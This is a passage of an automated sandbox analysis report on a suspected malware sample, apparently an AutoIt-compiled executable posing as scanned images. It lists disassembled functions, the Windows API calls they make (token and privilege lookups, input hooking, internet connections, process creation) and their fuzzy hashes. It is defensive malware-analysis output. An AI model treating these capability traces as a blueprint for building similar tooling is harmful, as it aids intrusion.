                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: f376b60a0aaede1d767612f36a8032cc4b939aaff4e93bcc59ef9fc6e5ce6347
                                                        • Instruction ID: 75311c39344984b6cfb9e7174d29076635692831897c357f0d3a21d2f78eaca5
                                                        • Opcode Fuzzy Hash: f376b60a0aaede1d767612f36a8032cc4b939aaff4e93bcc59ef9fc6e5ce6347
                                                        • Instruction Fuzzy Hash: 2E31E131600246AFDF21CF75CA44BBA7BB5FF41312F554129EC54871A1E731D899DB90
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00AA5189
                                                          • Part of subcall function 00A8387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A83897
                                                          • Part of subcall function 00A8387D: GetCurrentThreadId.KERNEL32 ref: 00A8389E
                                                          • Part of subcall function 00A8387D: AttachThreadInput.USER32(00000000,?,00A852A7), ref: 00A838A5
                                                        • GetCaretPos.USER32(?), ref: 00AA519A
                                                        • ClientToScreen.USER32(00000000,?), ref: 00AA51D5
                                                        • GetForegroundWindow.USER32 ref: 00AA51DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: ad9d66df3c4d973ade1eec3bacfca077846e82c8d92000c31f67b24d0e4ae68b
                                                        • Instruction ID: 1fc7b6289596bda04a6aaceb37281411666e17d880ac585cbd81b20b1b0a6bf4
                                                        • Opcode Fuzzy Hash: ad9d66df3c4d973ade1eec3bacfca077846e82c8d92000c31f67b24d0e4ae68b
                                                        • Instruction Fuzzy Hash: 1E310F72D00118AFDB04EFA9D945DEFB7F9EF99700F10406AE415E7241DA759E05CBA0
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • GetCursorPos.USER32(?), ref: 00AAC7C2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A5BBFB,?,?,?,?,?), ref: 00AAC7D7
                                                        • GetCursorPos.USER32(?), ref: 00AAC824
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A5BBFB,?,?,?), ref: 00AAC85E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID:
                                                        • API String ID: 2864067406-0
                                                        • Opcode ID: 40a83e7b4ba2ed164493e19900aefefa2f7242e134c64a7d06040dbbfb1d796d
                                                        • Instruction ID: efd977a38ecd46c0f4fef52c39a3765e77691190e43c82e8939871adecf1438d
                                                        • Opcode Fuzzy Hash: 40a83e7b4ba2ed164493e19900aefefa2f7242e134c64a7d06040dbbfb1d796d
                                                        • Instruction Fuzzy Hash: E2319439600018EFDB15CF98C898EEA7BB6FB4E720F044069F9058B2A1D7359D51DFA0
                                                        APIs
                                                          • Part of subcall function 00A78652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A78669
                                                          • Part of subcall function 00A78652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A78673
                                                          • Part of subcall function 00A78652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A78682
                                                          • Part of subcall function 00A78652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A78689
                                                          • Part of subcall function 00A78652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A7869F
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00A78BEB
                                                        • _memcmp.LIBCMT ref: 00A78C0E
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A78C44
                                                        • HeapFree.KERNEL32(00000000), ref: 00A78C4B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                        • String ID:
                                                        • API String ID: 1592001646-0
                                                        • Opcode ID: 0c232d006c474b2c8746bfdb467089f05df87b818b6ce853964ec82181c7d52a
                                                        • Instruction ID: 0873e13f9d2bd3210aeda6c5c53cfe3a907df408e2853c16b8f5e8d603816e54
                                                        • Opcode Fuzzy Hash: 0c232d006c474b2c8746bfdb467089f05df87b818b6ce853964ec82181c7d52a
                                                        • Instruction Fuzzy Hash: CD218D71E41209EFCB14CF94CD49BAEB7B8EF40350F15C059E558A7240DB38AA06CB61
                                                        APIs
                                                        • __setmode.LIBCMT ref: 00A40BF2
                                                          • Part of subcall function 00A25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A87B20,?,?,00000000), ref: 00A25B8C
                                                          • Part of subcall function 00A25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A87B20,?,?,00000000,?,?), ref: 00A25BB0
                                                        • _fprintf.LIBCMT ref: 00A40C29
                                                        • OutputDebugStringW.KERNEL32(?), ref: 00A76331
                                                          • Part of subcall function 00A44CDA: _flsall.LIBCMT ref: 00A44CF3
                                                        • __setmode.LIBCMT ref: 00A40C5E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                        • String ID:
                                                        • API String ID: 521402451-0
                                                        • Opcode ID: 6771d0a7a2248b33cad8c2f507e691c728b87ac4119c10529a7f322b0b04e2ef
                                                        • Instruction ID: 2afefd5685e6ad916b515425acbec90d77d4f17e476101406b5d8409b533b19d
                                                        • Opcode Fuzzy Hash: 6771d0a7a2248b33cad8c2f507e691c728b87ac4119c10529a7f322b0b04e2ef
                                                        • Instruction Fuzzy Hash: FE113A36904214BEDB04B3B8AD83EBE7B699F89320F14412AF204571D2DF315D869395
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A91A97
                                                          • Part of subcall function 00A91B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A91B40
                                                          • Part of subcall function 00A91B21: InternetCloseHandle.WININET(00000000), ref: 00A91BDD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 1463438336-0
                                                        • Opcode ID: 608c3b435cbcd72eff9a2e895407cb3041cc023e56f4c29de66a7f5326d1521f
                                                        • Instruction ID: 3093bfb9174ef5c1f267c714dd821f7abf25fa69bdad71afe3ee75ca6bc1e3ad
                                                        • Opcode Fuzzy Hash: 608c3b435cbcd72eff9a2e895407cb3041cc023e56f4c29de66a7f5326d1521f
                                                        • Instruction Fuzzy Hash: 71216F35300606BFEF169FA08C41FBAB7EEFF45701F10441AFA5696691EB7198119BA0
                                                        APIs
                                                          • Part of subcall function 00A7F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00A7E1C4,?,?,?,00A7EFB7,00000000,000000EF,00000119,?,?), ref: 00A7F5BC
                                                          • Part of subcall function 00A7F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00A7F5E2
                                                          • Part of subcall function 00A7F5AD: lstrcmpiW.KERNEL32(00000000,?,00A7E1C4,?,?,?,00A7EFB7,00000000,000000EF,00000119,?,?), ref: 00A7F613
                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00A7EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00A7E1DD
                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00A7E203
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00A7EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00A7E237
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        APIs
                                                        • _free.LIBCMT ref: 00A55351
                                                          • Part of subcall function 00A4594C: __FF_MSGBANNER.LIBCMT ref: 00A45963
                                                          • Part of subcall function 00A4594C: __NMSG_WRITE.LIBCMT ref: 00A4596A
                                                          • Part of subcall function 00A4594C: RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000000,?,?,?,00A41013,?), ref: 00A4598F
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A24560
                                                          • Part of subcall function 00A2410D: _memset.LIBCMT ref: 00A2418D
                                                          • Part of subcall function 00A2410D: _wcscpy.LIBCMT ref: 00A241E1
                                                          • Part of subcall function 00A2410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A241F1
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00A245B5
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A245C4
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A5D6CE
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                        • String ID:
                                                        • API String ID: 1378193009-0
                                                        APIs
                                                          • Part of subcall function 00A25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A87B20,?,?,00000000), ref: 00A25B8C
                                                          • Part of subcall function 00A25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A87B20,?,?,00000000,?,?), ref: 00A25BB0
                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00A966AC
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A966B7
                                                        • _memmove.LIBCMT ref: 00A966E4
                                                        • inet_ntoa.WSOCK32(?), ref: 00A966EF
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 1504782959-0
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A79043
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A79055
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A7906B
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A79086
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 00A212D8
                                                        • GetClientRect.USER32(?,?), ref: 00A5B84B
                                                        • GetCursorPos.USER32(?), ref: 00A5B855
                                                        • ScreenToClient.USER32(?,?), ref: 00A5B860
                                                        Similarity
                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 4127811313-0
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A801FD,?,00A81250,?,00008000), ref: 00A8166F
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00A801FD,?,00A81250,?,00008000), ref: 00A81694
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A801FD,?,00A81250,?,00008000), ref: 00A8169E
                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00A801FD,?,00A81250,?,00008000), ref: 00A816D1
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00AAB59E
                                                        • ScreenToClient.USER32(?,?), ref: 00AAB5B6
                                                        • ScreenToClient.USER32(?,?), ref: 00AAB5DA
                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AAB5F5
                                                        Similarity
                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                        • String ID:
                                                        • API String ID: 357397906-0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00AAB8FE
                                                        • _memset.LIBCMT ref: 00AAB90D
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00AE7F20,00AE7F64), ref: 00AAB93C
                                                        • CloseHandle.KERNEL32 ref: 00AAB94E
                                                        Similarity
                                                        • API ID: _memset$CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3277943733-0
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00A86E88
                                                          • Part of subcall function 00A8794E: _memset.LIBCMT ref: 00A87983
                                                        • _memmove.LIBCMT ref: 00A86EAB
                                                        • _memset.LIBCMT ref: 00A86EB8
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00A86EC8
                                                        Similarity
                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                        • String ID:
                                                        • API String ID: 48991266-0
                                                        APIs
                                                          • Part of subcall function 00A212F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A2134D
                                                          • Part of subcall function 00A212F3: SelectObject.GDI32(?,00000000), ref: 00A2135C
                                                          • Part of subcall function 00A212F3: BeginPath.GDI32(?), ref: 00A21373
                                                          • Part of subcall function 00A212F3: SelectObject.GDI32(?,00000000), ref: 00A2139C
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AAC030
                                                        • LineTo.GDI32(00000000,?,?), ref: 00AAC03D
                                                        • EndPath.GDI32(00000000), ref: 00AAC04D
                                                        • StrokePath.GDI32(00000000), ref: 00AAC05B
                                                        Similarity
                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                        • String ID:
                                                        • API String ID: 1539411459-0
                                                        • Opcode ID: c3edc165dfdd27788d171800ede9315de6114088645417ec738b6e5bb73f76e0
                                                        • Instruction ID: a2af7a1573f08167e902cccc821864bee46a5792492b18065fb829c9a195a9ec
                                                        • Opcode Fuzzy Hash: c3edc165dfdd27788d171800ede9315de6114088645417ec738b6e5bb73f76e0
                                                        • Instruction Fuzzy Hash: B6F05E3100125AFBDB22AFD4AC09FCE3F59AF16321F044010FA11650E287B55552CFD5
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A7A399
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00A7A3AC
• GetCurrentThreadId.KERNEL32 ref: 00A7A3B3
• AttachThreadInput.USER32(00000000), ref: 00A7A3BA
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 5fc231f737b235743868f5efb0f4eedf9aee42997efb327f1ff258f6f9a0e770
• Instruction ID: 6c2b5a1dcccf28e67be6d26eea260031f00a8a44cfb9493b0b3f0948244148a3
• Opcode Fuzzy Hash: 5fc231f737b235743868f5efb0f4eedf9aee42997efb327f1ff258f6f9a0e770
• Instruction Fuzzy Hash: 24E0C931545269BADB249FE2DC0DEEB7F5CEF267A2F00C025F609990A0C7718541DBA1
APIs
• GetSysColor.USER32(00000008), ref: 00A22231
• SetTextColor.GDI32(?,000000FF), ref: 00A2223B
• SetBkMode.GDI32(?,00000001), ref: 00A22250
• GetStockObject.GDI32(00000005), ref: 00A22258
• GetWindowDC.USER32(?,00000000), ref: 00A5C0D3
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00A5C0E0
• GetPixel.GDI32(00000000,?,00000000), ref: 00A5C0F9
• GetPixel.GDI32(00000000,00000000,?), ref: 00A5C112
• GetPixel.GDI32(00000000,?,?), ref: 00A5C132
• ReleaseDC.USER32(?,00000000), ref: 00A5C13D
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
• Opcode ID: 20575bcda3d9e1e1b9236d7a1a4aea184cd79ef425908590e019d94961e6681c
• Instruction ID: c757ed7a09b088dd03d97683decfa2c78011f870819573f4a71fb662f04ebae6
• Opcode Fuzzy Hash: 20575bcda3d9e1e1b9236d7a1a4aea184cd79ef425908590e019d94961e6681c
• Instruction Fuzzy Hash: F7E03932600245EEDB259FE8FC097D83B10EB16332F008376FB69480E587724985DB22
APIs
• GetCurrentThread.KERNEL32 ref: 00A78C63
• OpenThreadToken.ADVAPI32(00000000,?,?,?,00A7882E), ref: 00A78C6A
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A7882E), ref: 00A78C77
• OpenProcessToken.ADVAPI32(00000000,?,?,?,00A7882E), ref: 00A78C7E
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: da96f3b1ad9ac28777ef2620351c2600edc57e5c94ce74773ef35965c8e362cc
• Instruction ID: 8f9185d614c1e613040836b7cb243569632d720a81ec1e3093e44f3fb7b7f43f
• Opcode Fuzzy Hash: da96f3b1ad9ac28777ef2620351c2600edc57e5c94ce74773ef35965c8e362cc
• Instruction Fuzzy Hash: 1FE08636742212DFD7649FF16D0CB973BACEF52792F088828B645C90C0EB388446CB61
APIs
• GetDesktopWindow.USER32 ref: 00A62187
• GetDC.USER32(00000000), ref: 00A62191
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A621B1
• ReleaseDC.USER32(?), ref: 00A621D2
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: b8f1fd207832446fc2b8f1dd1decaed729850e37a5bef338a3b92afe637bb92d
• Instruction ID: c682c12b1ba8c7dbd4ba87863a161408b949b03f7f8b33eb18a4bf433cffcf5a
• Opcode Fuzzy Hash: b8f1fd207832446fc2b8f1dd1decaed729850e37a5bef338a3b92afe637bb92d
• Instruction Fuzzy Hash: 44E01A75800615EFDB159FE4D908A9DBBF1EB4D351F108425FD5A972A0DB3881429F40
APIs
• GetDesktopWindow.USER32 ref: 00A6219B
• GetDC.USER32(00000000), ref: 00A621A5
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A621B1
• ReleaseDC.USER32(?), ref: 00A621D2
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 070121bf3185a9dc48bc381d720b44084ad5bdf442815292090cff6e58330327
• Instruction ID: 2740071906a4b6d1a678457d1eb57286a6110f9fc3aa9b24e14e308c93a3bdc0
• Opcode Fuzzy Hash: 070121bf3185a9dc48bc381d720b44084ad5bdf442815292090cff6e58330327
• Instruction Fuzzy Hash: 41E012B5C00216AFCB259FF4D90869EBBF1EB4D361F108029F95AA72A0DB3891429F40
APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 00A7B981
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
Similarity
• API ID: ContainedObject
• String ID: AutoIt3GUI$Container
• API String ID: 3565006973-3941886329
• Opcode ID: 4521131cbb924108471bce4d3ce2c6e626ecb08fbf6f05d9c0936e6e66df64b4
• Instruction ID: d162393bb156f06b143b33a06c998116267774a2a1ed9b4fc110666d979b23e0
• Opcode Fuzzy Hash: 4521131cbb924108471bce4d3ce2c6e626ecb08fbf6f05d9c0936e6e66df64b4
• Instruction Fuzzy Hash: 45913AB4610601AFDB24DF68C884B6AB7F9FF48710F14C56EE94ACB691DB70E840CB60
APIs
  • Part of subcall function 00A3FEC6: _wcscpy.LIBCMT ref: 00A3FEE9
  • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
  • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
• __wcsnicmp.LIBCMT ref: 00A8B298
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00A8B361
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
